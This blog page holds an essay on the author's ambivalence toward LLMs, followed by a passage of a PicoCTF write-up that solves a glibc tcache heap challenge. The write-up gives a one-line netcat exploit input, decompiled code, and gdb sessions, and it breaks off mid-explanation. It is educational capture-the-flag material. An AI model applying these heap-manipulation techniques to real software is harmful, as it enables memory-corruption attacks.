27 May 2025
I have a love-hate relationship with Large Language Models (LLMs). I feel like they are bad citizens of the internet and will have bad effects long term. At the same time, I feel like I have to use them to not be left behind.
Why is there this Catch-22 with LLMs? Why do I have such a difficult relationship with LLMs?
The Good
LLMs are, without a doubt, amazing tools. I can ask them very detailed questions, and it will somehow come up with an answer. They do make things easier. They help me write. asideHeck, while I wrote the original version, what you read here was reviewed and improved by an LLM! While coding, it is nice to have a very friendly, but also very junior pair coder at my fingertips. It is nice to have a kiind of “living documentation” that not just tells me how to write a module in Angular, but actually adapts the module directly to my needs.
LLMs are amazing!
The Bad
At the same time, I notice a big problem: I just forget to think. It’s easier to just ask an LLM than to do the work myself. I see this with others too. They start coding with an LLM, but because they never have to fully understand the APIs, they do not understand the bugs. They do not understand why something is not working, or is slow.
I do not want to say this is all bad. A calculator is not bad either. asideAnd I like my calculator, especially since I often make stupid mistakes when doing math by hand. At the same time, I do see the value of having learned how to do the math myself. It allows me to apply these formulas to more places, and I can spot wildly wrong result when I mistype something into the calculator.
There’s real value in knowing how to these things without the help of tools.
Another issue: LLMs are not as good as we think. Writing a few acceptable paragraphs isn’t actually a hard task. And honestly, that’s mostly what LLMs do. If you think they’re doing more than that, go read a book by a truly good author.
It does not produce maintable code. Yes, I tried. With different models. But they learn from Stack Overflow, which contains just a few snippets of code. Writing maintainable code is more of an art than a science. I can already imaging that in 5 - 10 years, I’ll be charging a major premium to clean up AI-generated “slop code.”
How many serious security issues will be introduced by people who just “vibe code”?
It also works best if you already know what to ask for. For example, I cannot create a good image with an LLM. Just look at the image for this post! I can’t explain exactly what is wrong with it, so I don’t know how to ask the model to fix it.
It is the same with code. I can tell an LLM to not store passwords in plaintext and instead use a cryptographically secure hash. But if someone doesn’t know the words “cryptographically secure hash”, how would they know what to ask? Or that there’s a problem at all?
The Ugly
Now, here comes the ugly part. The rest is all fixable with time. But here is the real Catch-22, the real crutch of the problem.
LLMs are trained on stolen content. Yes, I know, people argue if it really is stealing, but it is! Just look at the crave around the Studio Ghibli-themed images! The companies behind models admit that their business model would not work if they were not allowed to steal.
This is the “Uber argument”. Uber also claimed that their business model wouldn’t work if they would have to employ (and with that, pay fairly) their drivers. I strongly believe such business models just should not exist.
Using an LLM also seems to turn off our brains. There is something magical having a tool tell you what the odds are. Studies have shown that when an AI tells us something, we just believe it. And even worse, we absorb the biases of whatever model we use! Of course we also absorb the biases of the people around us. But that at least it distributed. If we have 3-4 AI models in the future (which I think is highly likely, as the network effect helps the AI get better. As it helped Google Search get better), then 3-4 companies control our thinking.
Even if the companies do not try to be biased, bias can sneak in. A famous example is when an AI model was racist. So the creators removed “race” as an input. What did the AI model do? It just ended up using ZIP-codes as a proxy for race. asideI know, shocking!
And I wonder: who will train the LLMs in the future? If more and more internet content is made by LLMs, and then LLMs train on that content, the biases will just repeat and grow stronger. The dead internet theory says ‘Hi’.
Will an LLM go and take a walk around a lake with a confidential source as investigative journalist do today?
And I haven’t even mentioned the environmental cost of training and running these models.
So…
Should we throw the baby our with the bathwater? No. But we, as a society, need to decide what is OK and what isn’t. Where should we use LLMs? And where should LLMs be forbidden, even if that means accepting inefficiencies?
The problem is: The cat is already out of the bag. Even if “we” (as in, the west) decided to stop, other parts of the world with weaker privacy protections would keep going. Should we just leave the playing field to them? Probably not. But we must find the right way to move forward.
Another Catch-22.
Should you be worried about LLMs? This is for you to decide.
Me? I am not. At least not for my livelyhood. There will always be a space for people who are willing to go the extra mile, to deeply understand things. But I do worry what this means for society. And I am not so sure that in the future we will look back and agree that this was a positive development. But we will all use LLMs. Because we have to.
And if everything goes wrong, I’ll just spend my days cleaning up AI-slop code. For a ridiculous daily fee.
11 May 2021
Heap exploits have always been a mystery to me. I am generally not that experienced with binary exploitation, so when a heap exploit came up on the recent PicoCTF competition I decided this is a good moment to take a closer look at heap exploits. This took me down, well, I can’t really call it a rabbit hole. It felt more like falling into a huge sinkhole.
So I guess this is my addition to the heap of failed attempts at explaining how head exploitation works.
Challenge
The challenge was:
Cache Me Outside
While being super relevant with my meme references, I wrote a program to see how much you understand heap allocations. nc mercury.picoctf.net 31153
It came with three files: A binary, a makefile, as well as a libc file. Additionally, there was a hint that points to glibc’s tcache
.
TLDR
The solution is:
$ echo "-5144\n\x00\n\n" | nc mercury.picoctf.net 31153
Input one has to be -5144
, input two \x00
. Yes, I need thousands of words to explain how I derived two simple inputs. I said heap exploitation is convoluted.
Exploring The Binary
First things first, let’s run the binary on the remote server:
$ nc mercury.picoctf.net 31153
You may edit one byte in the program.
Address: AAAAA
Value: t help you: this is a random string.
It allows me to enter an address (here I used AAAAA
) and then returns what seems like a partial string (t help you: this is a random string.
)
Prepare The Local Binary
A good start is always strings
.
$ strings heapedit
[...snip...]
this is H
a randomH
string.H
CongratsH
! Your fH
lag is: H
Sorry! TH
his won'H
t help yH
[...snip...]
It does return a few string fragments (this is H
, ag is: H
, Sorry! TH
, etc). Otherwise it does not return too much of interest.
Since that didn’t help, run the binary: asideIf you are running a virus now, well… Sorry!
$ ./heapedit
zsh: segmentation fault ./heapedit
That does not work, because the libc version of the binary does not agree with the libc version of the system.
$ ./libc.so.6 # libc of the challenge
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.2) stable release version 2.27.
$ ldd --version # libc of my system
ldd (Debian GLIBC 2.31-9) 2.31
The binary was compiled against 2.27, but locally, I have 2.31 (from ldd
). This is most likely why it won’t run. One way to fix it (sometimes, at least), is to use pwninit. It will download a dynamic linker compatible with the expected libc version. Then we can run the tool against this libc library instead of the system library. Putting the executable as well as libc.so.6
in the same folder, then running pwninit
.
$ pwninit
bin: ./heapedit
libc: ./libc.so.6
fetching linker
setting ./ld-2.27.so executable
This downloads a linker compatible with the libc version of the binary. Now we can run the binary by overwriting the library load path with LD_PRELOAD
.
$ LD_PREALOAD=./libc.so.6 ./ld-2.27.so ./heapedit
zsh: segmentation fault LD_PREALOAD=./libc.so.6 ./ld-2.27.so ./heapedit
It still crashes! To figure out why, we need to be able to run it, to debug it. But working with binaries that need to have LD_PRELOAD
set is a bit cumbersome. For example, I would love to just run ltrace
on it to get an idea what is happening. With LD_PRELOAD set, this won’t work, as then ltrace
would also be run with a different libc, which, in turn, does not work. Welcome, cyclic dependency hell! However, we can just rewrite the interpreter in the binary. First, let’s check the libc it points right now:
$ file heapedit
heapedit_orig: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6967c296c25feb50c480b4edb5c56c234bb30392, not stripped
It points to /lib64/ld-linux-x86-64.so.2
. We can rewrite it with patchelf
:
$ patchelf --set-interpreter ./ld-2.27.so ./heapedit
$ file ./heapedit
./heapedit: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./ld-2.27.so, for GNU/Linux 3.2.0, BuildID[sha1]=6967c296c25feb50c480b4edb5c56c234bb30392, not stripped
Now we can run heapedit
without LD_PRELOAD
.
$ ./heapedit
zsh: segmentation fault ./heapedit
But we still get a segfault! At least now we can run other tools against the binary. For example, ltrace
. ltrace
, Library Trace, will trace all dynamic library calls. This, together with the similar strace
, that tracks system calls, is a very easy way to see roughly what an executable does.
$ ltrace ./heapedit
setbuf(0x7fcf63e56760, 0) = <void>
fopen("flag.txt", "r") = 0
fgets( <no return ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
ltrace
shows that it calls fopen
to open a file called flag.txt
, calls fgets — most likely with the file handle from fopen — and segfaults. It is probably safe to assume that the flag.txt
is required to run heapedit
. Luckily, there is an easy fix for that.
$ echo "iamaflag" > flag.txt
$ ./heapedit
You may edit one byte in the program.
Address: AAAA
Value: t help you: this is a random string.
Perfect! The binary finally runs locally. (Thanks to this writeup for the hints on how to get the file running without changing to a completely new VM with the same libc version.)
But, we still are nowhere near to actually solving the challenge. Let’s open the binary in ghidra to see what is actually happening.
Reversing The Binary
Importing the binary into ghidra, running all analyzers and then searching for main
gives the following decompiled output: asidePSA: Newer trust the decompiler, dummy!
(Note you can change between the raw output of ghidra and the slightly cleaned up version at the top of the code listing by clicking on “ghidra” and “cleaned”.)
undefined8 main(void)
{
long in_FS_OFFSET;
undefined local_a9;
int local_a8;
int local_a4;
undefined8 *local_a0;
undefined8 *local_98;
FILE *local_90;
undefined8 *local_88;
void *local_80;
undefined8 local_78;
undefined8 local_70;
undefined8 local_68;
undefined local_60;
char local_58 [72];
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
setbuf(stdout,(char *)0x0);
local_90 = fopen("flag.txt","r"); // (1)
fgets(local_58,0x40,local_90);
local_78 = 0x2073692073696874; // (2)
local_70 = 0x6d6f646e61722061;
local_68 = 0x2e676e6972747320;
local_60 = 0;
local_a0 = (undefined8 *)0x0;
local_a4 = 0;
while (local_a4 < 7) { // (3)
local_98 = (undefined8 *)malloc(0x80);
if (local_a0 == (undefined8 *)0x0) {
local_a0 = local_98; // (4)
}
*local_98 = 0x73746172676e6f43; // (5)
local_98[1] = 0x662072756f592021;
local_98[2] = 0x203a73692067616c;
*(undefined *)(local_98 + 3) = 0;
strcat((char *)local_98,local_58); // (6)
local_a4 = local_a4 + 1;
}
local_88 = (undefined8 *)malloc(0x80); // (7)
*local_88 = 0x5420217972726f53;
local_88[1] = 0x276e6f7720736968;
local_88[2] = 0x7920706c65682074;
*(undefined4 *)(local_88 + 3) = 0x203a756f;
*(undefined *)((long)local_88 + 0x1c) = 0;
strcat((char *)local_88,(char *)&local_78); // (8)
free(local_98); // (9)
free(local_88);
local_a8 = 0;
local_a9 = 0;
puts("You may edit one byte in the program.");
printf("Address: ");
__isoc99_scanf(&DAT_00400b48,&local_a8); // (10)
printf("Value: ");
__isoc99_scanf(&DAT_00400b53,&local_a9); // (11)
*(undefined *)((long)local_a8 + (long)local_a0) = local_a9;
local_80 = malloc(0x80); // (12)
puts((char *)((long)local_80 + 0x10)); // (13)
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
}
undefined8 main(void)
{
long in_FS_OFFSET;
char new_byte;
int address;
int iStack164;
undefined *first_malloc_data;
char **flag_data;
FILE *flag_file_ptr;
char **random_data;
char **last_malloc;
char random_string [24];
char flag_ptr [72];
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
setbuf(stdout,(char *)0x0);
flag_file_ptr = fopen("flag.txt","r"); // (1)
fgets(flag_ptr,0x40,flag_file_ptr);
random_string._0_8_ = 2338328219631577204; // (2)
random_string._8_8_ = 7885631897793077345;
random_string._16_8_ = 3343762647516738336;
first_malloc_data = (undefined *)0x0;
i = 0;
while (i < 7) { // (3)
flag_data = (char **)malloc(0x80);
if (first_malloc_data == (undefined *)0x0) {
first_malloc_data = (undefined *)flag_data; // (4)
}
*flag_data = (char *)8319381555649605443; // (5)
flag_data[1] = (char *)7359007639828242465;
flag_data[2] = (char *)2322295453215318380;
*(undefined *)(flag_data + 3) = 0;
strcat((char *)flag_data,flag_ptr); // (6)
i = i + 1;
}
random_data = (char **)malloc(0x80); // (7)
*random_data = (char *)6061881903935549267;
random_data[1] = (char *)2841330972353587560;
random_data[2] = (char *)8728099688704122996;
*(undefined4 *)(random_data + 3) = 540702063;
*(undefined *)((long)random_data + 0x1c) = 0;
strcat((char *)random_data,random_string); // (8)
free(flag_data); // (9)
free(random_data);
address = 0;
new_byte = '\0';
puts("You may edit one byte in the program.");
printf("Address: ");
__isoc99_scanf("%d",&address); // (10)
printf("Value: ");
__isoc99_scanf(" %c",&new_byte); // (11)
first_malloc_data[address] = new_byte;
last_malloc = (char **)malloc(0x80); // (12)
puts((char *)(last_malloc + 2));
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
}
The code first loads a file called flag.txt (1) and stores it in the stack variable flag_ptr
. Then it prepares a char array (2) with the string “This is a random string.”. It then starts a loop (3) that will allocate 7 chunks of 0x80 in size. The chunks will contain a string (5) “Congrats! Your flag is: “ and the flag (6). It also stores the first chunk in a separate stack variable first_malloc_data
(4). Note that the flag_data
pointer is overwritten in each iteration of the loop without freeing the allocated chunk first. This is a classic memory leak.
After the loop it allocates the random_data
chunk of size 0x80 (7) and adds the string “Sorry, this will not help you: “ and a random string (8). Afterwards, it frees first_malloc_data
containing the flag (9), then frees random_data
. It reads an address from standard input (10) as well as a new byte (11) and writes the new byte to first_malloc_data[address]
. It allocates one last chunk last_malloc
of size 0x80 (12) and prints that chunk as a string (minus the first few bytes). Afterwards it exits.
The bug (or, well, feature) of the code is that we can write one byte anywhere in memory, relative to an address in the heap. The second problem is that the last_malloc
chunk gets allocated in (12) and then printed, without zeroing or changing the data. From the output from the program we know that thelast_malloc
chunk is the same as the last freed chunk random_data
, as it prints the same text as put into random_data
in (7).
If we just could get the allocator to return us the chunk with the flag… But, can we? Yes, we can. But this will now require a bit of knowledge about how the heap works.
The Heap Explained
When running a process, there are different ways to store data in memory. Generally, there is the stack and the heap.
Theoretically, there is a third way, what I like to call the “anywhere in process memory”. There is nothing limiting us from just placing some data at address 0x7f88443322110044, as long as that address is memory mapped. I would not recommend that, however.
A memory map can be dumped with gdb
:
gef➤ info proc mappings
process 1203
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x400000 0x401000 0x1000 0x0 /home/picoctf/cache-me-outside/heapedit
0x600000 0x601000 0x1000 0x0 /home/picoctf/cache-me-outside/heapedit
0x601000 0x602000 0x1000 0x1000 /home/picoctf/cache-me-outside/heapedit
0x602000 0x623000 0x21000 0x0 [heap]
0x7ffff7ded000 0x7ffff7e12000 0x25000 0x0 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7ffff7e12000 0x7ffff7f5d000 0x14b000 0x25000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7ffff7f5d000 0x7ffff7fa7000 0x4a000 0x170000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7ffff7fa7000 0x7ffff7fa8000 0x1000 0x1ba000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7ffff7fa8000 0x7ffff7fab000 0x3000 0x1ba000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7ffff7fab000 0x7ffff7fae000 0x3000 0x1bd000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7ffff7fae000 0x7ffff7fb4000 0x6000 0x0
0x7ffff7fcc000 0x7ffff7fd0000 0x4000 0x0 [vvar]
0x7ffff7fd0000 0x7ffff7fd2000 0x2000 0x0 [vdso]
0x7ffff7fd2000 0x7ffff7fd3000 0x1000 0x0 /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x7ffff7fd3000 0x7ffff7ff3000 0x20000 0x1000 /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x7ffff7ff3000 0x7ffff7ffb000 0x8000 0x21000 /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x7ffff7ffc000 0x7ffff7ffd000 0x1000 0x29000 /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x7ffff7ffd000 0x7ffff7ffe000 0x1000 0x2a000 /usr/lib/x86_64-linux-gnu/ld-2.31.so
0x7ffff7ffe000 0x7ffff7fff000 0x1000 0x0
0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]
Here we can see that the [stack]
is mapped from 0x7ffffffde000
to 0x7ffffffff000
and the heap from 0x602000
to 0x623000
. You can also find this information for a running process without GDB. Exit gdb
and run vuln
again. Then, in a new terminal, get the memory map directly from the file system (1223
is the PID of vuln
):
$ cat /proc/1223/maps
00400000-00401000 r-xp 00000000 00:2a 2858 /home/picoctf/cache-me-outside/heapedit
00600000-00601000 r--p 00000000 00:2a 2858 /home/picoctf/cache-me-outside/heapedit
00601000-00602000 rw-p 00001000 00:2a 2858 /home/picoctf/cache-me-outside/heapedit
00a8a000-00aab000 rw-p 00000000 00:00 0 [heap]
7fa50edde000-7fa50ee03000 r--p 00000000 08:01 4458632 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ee03000-7fa50ef4e000 r-xp 00025000 08:01 4458632 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ef4e000-7fa50ef98000 r--p 00170000 08:01 4458632 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ef98000-7fa50ef99000 ---p 001ba000 08:01 4458632 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ef99000-7fa50ef9c000 r--p 001ba000 08:01 4458632 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ef9c000-7fa50ef9f000 rw-p 001bd000 08:01 4458632 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7fa50ef9f000-7fa50efa5000 rw-p 00000000 00:00 0
7fa50efbd000-7fa50efbe000 r--p 00000000 08:01 4458628 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fa50efbe000-7fa50efde000 r-xp 00001000 08:01 4458628 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fa50efde000-7fa50efe6000 r--p 00021000 08:01 4458628 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fa50efe7000-7fa50efe8000 r--p 00029000 08:01 4458628 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fa50efe8000-7fa50efe9000 rw-p 0002a000 08:01 4458628 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7fa50efe9000-7fa50efea000 rw-p 00000000 00:00 0
7fff22800000-7fff22821000 rw-p 00000000 00:00 0 [stack]
7fff22920000-7fff22924000 r--p 00000000 00:00 0 [vvar]
7fff22924000-7fff22926000 r-xp 00000000 00:00 0 [vdso]
The [heap]
is mapped from 0x00a8a000
to 0x00aab000
. Wasn’t it different before? Yes. This is because ASLR (Address Space Layout Randomization) is enabled on my system. Every time a process starts, the position of the heap and stack will be randomized.
The stack is used automatically by the compiler for parameters and local variables . Usually, you do not have know about that at all, except when writing assembly directly. But it can only store data with predetermined sizes at compile time. If you need variable sized data, you need a heap.
The heap is a separate memory region that is used by the allocator to allocate variable sized data — a string entered by the user, a package received from the network — aka chunks. The management of the heap is quite complicated, as it needs to be as fast as possible. Run an executable in gdb
, set a breakpoint on malloc
and, well, your process will be paused. A lot!
The high performance is achieved by using different techniques. When allocation a chunk of memory with malloc
or freeing it with free
, the allocator is called. It will reserve some memory in the [heap]
and return a pointer to this address. It will also mark this chunk as used. When the chunk is no longer required by the program, the program calls free
on that chunk.asideYou do call free
on all your mallocs
. Right? Right??? The allocator will then put that chunk into the pool of free resources. Note that the allocator is not a hard coded dependency and can be changed. For Linux programs, the glibc allocator is most often used.
How does the allocator manage these chunks? Now, here is where it gets complicated. To speed up the process of allocating new memory, the allocator does not always search through all of the heap memory to find a free space. Instead, it tries to reuse as many chunks as possible. Many programs tend to allocate and free many chunks of similar sizes in rapid succession, for example when allocating a new integer in each iteration of a loop. Hence the allocator puts freed chunks into so called bins (think recycling bins) for easy retrieval in case a similar sized chunk is requested immediately again.
The glibc allocator keeps many different bins of different shapes and sizes for performance optimizations. It has a number of small bins, large bins, unsorted bins, fast bins and tcache
bins. asideYes, it only took me, like, 2000 words to finally get to the tcache
! I will not go into detail here about all the different bins and strategies. If you are interested, I highly recommend the blog series “Understanding the Glibc Heap Implementation” by Azeria. Most of my understanding comes from these blog posts!
The interesting thing to note for this exploit is that when a chunk is freed, it is added to the tcache
. The tcache
is the “thread cache” where freed chunks go to be recycled if used again by the same thread. At least, at first, and only seven times, and only if it has the same size, but let’s not get into too much detail. For this exploit, it is true, it will be added to a tcache
list of memory chunks that will be reused by the allocator. This is why, at the end of the program, we get the last freed chunk back.
The following animation shows how elements are added and removed from the tcache
.
// Program Start
◄─── tcache bin
// Program Start
free(flag_data);
┌──────────────────┐
│ flag_data │◄─── tcache bin
└──────────────────┘
// Program Start
free(flag_data);
free(random_data);
┌──────────────────┐
│ flag_data │
└──────────────────┘
▲
│
┌────────┴─────────┐
│ random_data │◄─── tcache bin
└──────────────────┘
// Program Start
free(flag_data);
free(random_data);
last_malloc = malloc(0x80);
┌──────────────────┐
│ flag_data │◄─── tcache bin
└──────────────────┘
┌──────────────────┐
│ random_data │◄─── last_malloc
└──────────────────┘
The animation shows the tcache
from the program start and after each free. The first 7 mallocs from the loop are not visible in the tcache
, as all of these allocations are new allocations and are not in a recycling bin yet. asideYou do not buy bottles just to put them into a recycling bin, do you. Then the two frees are put in the tcache
. The tcache bin
pointer always points to the last freed chunk. The last malloc
does not allocate a new chunk, but will instead reuse the random_data
chunk from the tcache
bin. The tcache bin
pointer then points to flag_data
, as this is now the next free chunk in the tcache
.
Another way to take a look at the tcache
is to use gef to dump information about the heap. Let’s start the program again with gdb
and look at the tcache
.
gef➤ heap bin tcache
──────── Tcachebins for arena 0x7ffff7dcfc40 ──────
At the start it is, unsurprisingly, empty. Let’s set two breakpoints just after the calls to free
so we can inspect the tcache
. First, disassemble main in gdb
:
gef➤ disas main
Dump of assembler code for function main:
0x0000000000400807 <+0>: push rbp
0x0000000000400808 <+1>: mov rbp,rsp
0x000000000040080b <+4>: sub rsp,0xc0
0x0000000000400812 <+11>: mov DWORD PTR [rbp-0xb4],edi
0x0000000000400818 <+17>: mov QWORD PTR [rbp-0xc0],rsi
0x000000000040081f <+24>: mov rax,QWORD PTR fs:0x28
0x0000000000400828 <+33>: mov QWORD PTR [rbp-0x8],rax
0x000000000040082c <+37>: xor eax,eax
0x000000000040082e <+39>: mov rax,QWORD PTR [rip+0x200843] # 0x601078 <stdout@@GLIBC_2.2.5>
0x0000000000400835 <+46>: mov esi,0x0
0x000000000040083a <+51>: mov rdi,rax
0x000000000040083d <+54>: call 0x4006b0 <setbuf@plt>
0x0000000000400842 <+59>: lea rsi,[rip+0x2bf] # 0x400b08
0x0000000000400849 <+66>: lea rdi,[rip+0x2ba] # 0x400b0a
0x0000000000400850 <+73>: call 0x4006f0 <fopen@plt>
0x0000000000400855 <+78>: mov QWORD PTR [rbp-0x88],rax
0x000000000040085c <+85>: mov rdx,QWORD PTR [rbp-0x88]
0x0000000000400863 <+92>: lea rax,[rbp-0x50]
0x0000000000400867 <+96>: mov esi,0x40
0x000000000040086c <+101>: mov rdi,rax
0x000000000040086f <+104>: call 0x4006d0 <fgets@plt>
0x0000000000400874 <+109>: movabs rax,0x2073692073696874
0x000000000040087e <+119>: movabs rdx,0x6d6f646e61722061
0x0000000000400888 <+129>: mov QWORD PTR [rbp-0x70],rax
0x000000000040088c <+133>: mov QWORD PTR [rbp-0x68],rdx
0x0000000000400890 <+137>: movabs rax,0x2e676e6972747320
0x000000000040089a <+147>: mov QWORD PTR [rbp-0x60],rax
0x000000000040089e <+151>: mov BYTE PTR [rbp-0x58],0x0
0x00000000004008a2 <+155>: mov QWORD PTR [rbp-0x98],0x0
0x00000000004008ad <+166>: mov DWORD PTR [rbp-0x9c],0x0
0x00000000004008b7 <+176>: jmp 0x400933 <main+300>
0x00000000004008b9 <+178>: mov edi,0x80
0x00000000004008be <+183>: call 0x4006e0 <malloc@plt>
0x00000000004008c3 <+188>: mov QWORD PTR [rbp-0x90],rax
0x00000000004008ca <+195>: cmp QWORD PTR [rbp-0x98],0x0
0x00000000004008d2 <+203>: jne 0x4008e2 <main+219>
0x00000000004008d4 <+205>: mov rax,QWORD PTR [rbp-0x90]
0x00000000004008db <+212>: mov QWORD PTR [rbp-0x98],rax
0x00000000004008e2 <+219>: mov rax,QWORD PTR [rbp-0x90]
0x00000000004008e9 <+226>: movabs rsi,0x73746172676e6f43
0x00000000004008f3 <+236>: movabs rdi,0x662072756f592021
0x00000000004008fd <+246>: mov QWORD PTR [rax],rsi
0x0000000000400900 <+249>: mov QWORD PTR [rax+0x8],rdi
0x0000000000400904 <+253>: movabs rcx,0x203a73692067616c
0x000000000040090e <+263>: mov QWORD PTR [rax+0x10],rcx
0x0000000000400912 <+267>: mov BYTE PTR [rax+0x18],0x0
0x0000000000400916 <+271>: lea rdx,[rbp-0x50]
0x000000000040091a <+275>: mov rax,QWORD PTR [rbp-0x90]
0x0000000000400921 <+282>: mov rsi,rdx
0x0000000000400924 <+285>: mov rdi,rax
0x0000000000400927 <+288>: call 0x400710 <strcat@plt>
0x000000000040092c <+293>: add DWORD PTR [rbp-0x9c],0x1
0x0000000000400933 <+300>: cmp DWORD PTR [rbp-0x9c],0x6
0x000000000040093a <+307>: jle 0x4008b9 <main+178>
0x0000000000400940 <+313>: mov edi,0x80
0x0000000000400945 <+318>: call 0x4006e0 <malloc@plt>
0x000000000040094a <+323>: mov QWORD PTR [rbp-0x80],rax
0x000000000040094e <+327>: mov rax,QWORD PTR [rbp-0x80]
0x0000000000400952 <+331>: movabs rsi,0x5420217972726f53
0x000000000040095c <+341>: movabs rdi,0x276e6f7720736968
0x0000000000400966 <+351>: mov QWORD PTR [rax],rsi
0x0000000000400969 <+354>: mov QWORD PTR [rax+0x8],rdi
0x000000000040096d <+358>: movabs rcx,0x7920706c65682074
0x0000000000400977 <+368>: mov QWORD PTR [rax+0x10],rcx
0x000000000040097b <+372>: mov DWORD PTR [rax+0x18],0x203a756f
0x0000000000400982 <+379>: mov BYTE PTR [rax+0x1c],0x0
0x0000000000400986 <+383>: lea rdx,[rbp-0x70]
0x000000000040098a <+387>: mov rax,QWORD PTR [rbp-0x80]
0x000000000040098e <+391>: mov rsi,rdx
0x0000000000400991 <+394>: mov rdi,rax
0x0000000000400994 <+397>: call 0x400710 <strcat@plt>
0x0000000000400999 <+402>: mov rax,QWORD PTR [rbp-0x90]
0x00000000004009a0 <+409>: mov rdi,rax
0x00000000004009a3 <+412>: call 0x400680 <free@plt>
0x00000000004009a8 <+417>: mov rax,QWORD PTR [rbp-0x80]
0x00000000004009ac <+421>: mov rdi,rax
0x00000000004009af <+424>: call 0x400680 <free@plt>
0x00000000004009b4 <+429>: mov DWORD PTR [rbp-0xa0],0x0
0x00000000004009be <+439>: mov BYTE PTR [rbp-0xa1],0x0
0x00000000004009c5 <+446>: lea rdi,[rip+0x14c] # 0x400b18
0x00000000004009cc <+453>: call 0x400690 <puts@plt>
0x00000000004009d1 <+458>: lea rdi,[rip+0x166] # 0x400b3e
0x00000000004009d8 <+465>: mov eax,0x0
0x00000000004009dd <+470>: call 0x4006c0 <printf@plt>
0x00000000004009e2 <+475>: lea rax,[rbp-0xa0]
0x00000000004009e9 <+482>: mov rsi,rax
0x00000000004009ec <+485>: lea rdi,[rip+0x155] # 0x400b48
0x00000000004009f3 <+492>: mov eax,0x0
0x00000000004009f8 <+497>: call 0x400700 <__isoc99_scanf@plt>
0x00000000004009fd <+502>: lea rdi,[rip+0x147] # 0x400b4b
0x0000000000400a04 <+509>: mov eax,0x0
0x0000000000400a09 <+514>: call 0x4006c0 <printf@plt>
0x0000000000400a0e <+519>: lea rax,[rbp-0xa1]
0x0000000000400a15 <+526>: mov rsi,rax
0x0000000000400a18 <+529>: lea rdi,[rip+0x134] # 0x400b53
0x0000000000400a1f <+536>: mov eax,0x0
0x0000000000400a24 <+541>: call 0x400700 <__isoc99_scanf@plt>
0x0000000000400a29 <+546>: mov eax,DWORD PTR [rbp-0xa0]
0x0000000000400a2f <+552>: movsxd rdx,eax
0x0000000000400a32 <+555>: mov rax,QWORD PTR [rbp-0x98]
0x0000000000400a39 <+562>: add rdx,rax
0x0000000000400a3c <+565>: movzx eax,BYTE PTR [rbp-0xa1]
0x0000000000400a43 <+572>: mov BYTE PTR [rdx],al
0x0000000000400a45 <+574>: mov edi,0x80
0x0000000000400a4a <+579>: call 0x4006e0 <malloc@plt>
0x0000000000400a4f <+584>: mov QWORD PTR [rbp-0x78],rax
0x0000000000400a53 <+588>: mov rax,QWORD PTR [rbp-0x78]
0x0000000000400a57 <+592>: add rax,0x10
0x0000000000400a5b <+596>: mov rdi,rax
0x0000000000400a5e <+599>: call 0x400690 <puts@plt>
0x0000000000400a63 <+604>: mov eax,0x0
0x0000000000400a68 <+609>: mov rcx,QWORD PTR [rbp-0x8]
0x0000000000400a6c <+613>: xor rcx,QWORD PTR fs:0x28
0x0000000000400a75 <+622>: je 0x400a7c <main+629>
0x0000000000400a77 <+624>: call 0x4006a0 <__stack_chk_fail@plt>
0x0000000000400a7c <+629>: leave
0x0000000000400a7d <+630>: ret
Then set two breakpoints just after the two free
calls and continue the debugger.
gef➤ b *main+417
Breakpoint 4 at 0x4009a8
gef➤ b *main+429
Breakpoint 3 at 0x4009b4
gef➤ c
We can now inspect the tcache
after the first free
was hit.
gef➤ heap bin tcache
─────── Tcachebins for arena 0x7ffff7dcfc40 ───────
Tcachebins[idx=7, size=0x90] count=1 ← Chunk(addr=0x603800, size=0x90, flags=PREV_INUSE)
There is one chunk at address 0x603800
in the tcache
. Continue again so the second free
is called and inspect the tcache
.
gef➤ c
gef➤ heap bin tcache
─────── Tcachebins for arena 0x7ffff7dcfc40 ───────
Tcachebins[idx=7, size=0x90] count=2 ← Chunk(addr=0x603890, size=0x90, flags=PREV_INUSE) ← Chunk(addr=0x603800, size=0x90, flags=PREV_INUSE)
As expected, now there are two chunks in the tcache
. The new at address 0x603890
and the chunk from before at 0x603800
.
We can also inspect the two chunks:
gef➤ x/4xg 0x603800
0x603800: 0x0000000000000000 0x662072756f592021
0x603810: 0x203a73692067616c 0x67616c66616d6169
gef➤ x/4xg 0x603890
0x603890: 0x0000000000603800 0x276e6f7720736968
0x6038a0: 0x7920706c65682074 0x73696874203a756f
After the first 8 bytes the characters from the flag and the random string are still there. The first 8 bytes were overwritten by the allocator when the chunk was freed. The allocator will use it to store the pointer to the previous chunk in the tcache
. The first chunk contains a null pointer, the second chunk a pointer to the first. We now know that the tcache
is implemented as a stack.
If you do not have access to gef
, the address can also be found via gdb
. Let’s take a look at the relevant disassembly.
